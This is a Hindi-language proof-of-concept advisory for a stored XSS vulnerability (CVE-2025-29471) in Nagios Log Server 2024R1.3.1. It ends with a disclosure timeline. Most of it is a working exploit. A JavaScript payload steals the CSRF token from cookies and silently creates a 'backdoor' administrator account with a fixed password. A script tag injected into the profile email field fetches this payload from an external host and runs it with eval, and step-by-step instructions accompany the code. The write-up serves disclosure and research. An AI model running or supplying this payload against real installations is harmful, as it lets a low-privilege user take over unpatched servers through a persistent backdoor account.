
Nagios Log Server 2024R1.3.1 में संग्रहीत XSS
2024R1.3.1 और निचलेNagios Log Server 2024R1.3.1 (डिफ़ॉल्ट कॉन्फ़िगरेशन, Ubuntu 20.04)CWE-79CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:Hकेवल अधिकृत परीक्षण और अनुसंधान उद्देश्यों के लिए। इस भेद्यता का परीक्षण या शोषण उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।
Nagios Log Server 2024R1.3.1 में एक स्टोर्ड XSS भेद्यता एक निम्न-विशेषाधिकार वाले उपयोगकर्ता को अपने प्रोफ़ाइल के 'ईमेल' फ़ील्ड में दुर्भावनापूर्ण JavaScript इंजेक्ट करने की अनुमति देती है।
जब कोई व्यवस्थापक ऑडिट लॉग देखता है, तो पेलोड निष्पादित होता है, जिसके परिणामस्वरूप अनधिकृत व्यवस्थापक खाता निर्माण के माध्यम से विशेषाधिकार वृद्धि होती है।
अपने बाहरी सर्वर पर निम्नलिखित सामग्री के साथ xss.js पेलोड होस्ट करें। GitHub ठीक काम करता है।
<target-ip> को Nagios Log Server लक्ष्य के IP/होस्टनाम से अपडेट करें।
(function() {
console.log("🔥[XSS] Payload Executing...🔥");
var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
if (!csrfTokenMatch) return;
var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
console.log("[XSS] CSRF Token:", csrfToken);
var requestBody = "csrf_ls=" + csrfToken +
"&name=backdoor" +
"&[email protected]" +
"&username=backdoor" +
"&password=Password123!" +
"&password2=Password123!" +
"&auth_type=admin" +
"&apiaccess=1" +
"&language=en_US" +
"&account_type=local";
fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: requestBody
})
.then(response => response.text())
.then(function(data) {
console.log("🔥[XSS] User Created Successfully!🔥");
console.log(data);
})
.catch(console.error);
})();
Nagios Log Server में एक मानक (गैर-व्यवस्थापक) उपयोगकर्ता के रूप में लॉग इन करें।
प्रोफ़ाइल अपडेट समापन बिंदु पर जाएं:
http://<target-ip>/nagioslogserver/profile/update
ईमेल फ़ील्ड में निम्नलिखित पेलोड इंजेक्ट करें। fetch लाइन को उस URL से अपडेट करें जहां xss.js संग्रहीत है।
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
.then(response => response.text())
.then(scriptText => eval(scriptText))
.catch(console.error);
</script>
उपयोगकर्ता नाम: backdoor
पासवर्ड: Password123!
backdoor के रूप में पूर्ण व्यवस्थापक पहुँच के साथ लॉग इन करें।Nagios Log Server 2024R2 जारी कियाNagios Log Server 2024R2 स्टोर्ड XSS भेद्यता को हल करता है और Nagios को अद्यतन कियाCVE-2025-29471 आरक्षित किया, लेकिन विक्रेता से सार्वजनिक सुरक्षा सलाहकार के अभाव के कारण विवरण अप्रकाशित रहे2024R1.3.2) जारी किया जो स्टोर्ड XSS भेद्यता फिक्स को 2024R1 शाखा में बैकपोर्ट करता हैCVE-2025-29471 को औपचारिक रूप से प्रकाशित किया गयायह कार्य मेरी नौकरी के बाहर किया गया था और साइबर सुरक्षा अनुसंधान में मेरे व्यक्तिगत प्रयासों को दर्शाता है।